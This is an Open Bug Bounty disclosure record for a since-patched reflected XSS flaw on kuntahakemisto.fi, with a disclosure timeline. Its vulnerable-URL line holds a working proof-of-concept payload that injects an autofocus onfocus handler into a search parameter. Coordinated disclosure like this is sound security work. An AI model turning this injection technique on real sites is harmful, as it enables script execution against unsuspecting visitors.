kuntahakemisto.fi XSS vulnerability

2017-06-19T13:51:00
ID OBB:250030
Type openbugbounty
Reporter aaaimg
Modified 2017-07-17T15:16:00

Description

Vulnerable URL:
http://www.kuntahakemisto.fi/haku/q:a'%3E%22onfocus=prompt('OPENBUGBOUNTY')%20autofocus=%3E%3Edemona/place:Kuopio
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 12:56 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 12196499
VIP website status:| No
Check kuntahakemisto.fi SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 June, 2017 13:51 GMT
Vulnerability existence verified and confirmed| 19 June, 2017 14:50 GMT
Generic security notifications sent to website owner| 19 June, 2017 14:50 GMT
Vulnerability details disclosed by researcher| 17 July, 2017 15:16 GMT